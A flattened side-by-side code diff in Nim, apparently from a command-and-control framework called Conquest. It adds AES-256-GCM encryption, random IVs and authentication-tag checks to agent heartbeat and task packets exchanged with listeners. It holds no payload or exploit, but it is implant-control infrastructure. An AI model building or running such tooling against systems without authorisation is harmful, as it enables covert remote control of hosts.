if packetType != cast[uint8](MSG_HEARTBEAT): if header.packetType != cast[uint8](MSG_HEARTBEAT):
raise newException(CatchableError, "Invalid packet type for checkin request, expected MSG_HEARTBEAT.") raise newException(CatchableError, "Invalid packet type for checkin request, expected MSG_HEARTBEAT.")
# TODO: Validate sequence number # TODO: Validate sequence number
# TODO: Validate HMAC # Decrypt payload
let payload = unpacker.getBytes(int(header.size))
let (decData, gmac) = decrypt(cq.agents[uuidToString(header.agentId)].sessionKey, header.iv, payload, header.seqNr)
# TODO: Decrypt payload # Verify that the authentication tags match, which ensures the integrity of the decrypted data and AAD
# let payload = unpacker.getBytes(size) if gmac != header.gmac:
raise newException(CatchableError, "Invalid authentication tag (GMAC) for heartbeat.")
# Deserialize decrypted data
unpacker = initUnpacker(decData.toString)
return Heartbeat( return Heartbeat(
header: Header( header: header,
magic: magic,
version: version,
packetType: packetType,
flags: flags,
seqNr: seqNr,
size: size,
hmac: hmac
),
agentId: unpacker.getUint32(),
listenerId: unpacker.getUint32(), listenerId: unpacker.getUint32(),
timestamp: unpacker.getUint32() timestamp: unpacker.getUint32()
) )

View File

@@ -1,6 +1,6 @@
import strutils, strformat, times import strutils, strformat, times
import ../utils import ../utils
import ../../common/[types, utils] import ../../common/[types, utils, crypto]
proc parseInput*(input: string): seq[string] = proc parseInput*(input: string): seq[string] =
var i = 0 var i = 0
@@ -77,7 +77,6 @@ proc parseTask*(cq: Conquest, command: Command, arguments: seq[string]): Task =
# Construct the task payload prefix # Construct the task payload prefix
var task: Task var task: Task
task.taskId = uuidToUint32(generateUUID()) task.taskId = uuidToUint32(generateUUID())
task.agentId = uuidToUint32(cq.interactAgent.agentId)
task.listenerId = uuidToUint32(cq.interactAgent.listenerId) task.listenerId = uuidToUint32(cq.interactAgent.listenerId)
task.timestamp = uint32(now().toTime().toUnix()) task.timestamp = uint32(now().toTime().toUnix())
task.command = cast[uint16](command.commandType) task.command = cast[uint16](command.commandType)
@@ -104,9 +103,11 @@ proc parseTask*(cq: Conquest, command: Command, arguments: seq[string]): Task =
taskHeader.version = VERSION taskHeader.version = VERSION
taskHeader.packetType = cast[uint8](MSG_TASK) taskHeader.packetType = cast[uint8](MSG_TASK)
taskHeader.flags = cast[uint16](FLAG_PLAINTEXT) taskHeader.flags = cast[uint16](FLAG_PLAINTEXT)
taskHeader.seqNr = 1'u32 # TODO: Implement sequence tracking
taskHeader.size = 0'u32 taskHeader.size = 0'u32
taskHeader.hmac = default(array[16, byte]) taskHeader.agentId = uuidtoUint32(cq.interactAgent.agentId)
taskHeader.seqNr = 1'u64 # TODO: Implement sequence tracking
taskHeader.iv = generateIV() # Generate a random IV for AES-256 GCM
taskHeader.gmac = default(AuthenticationTag)
task.header = taskHeader task.header = taskHeader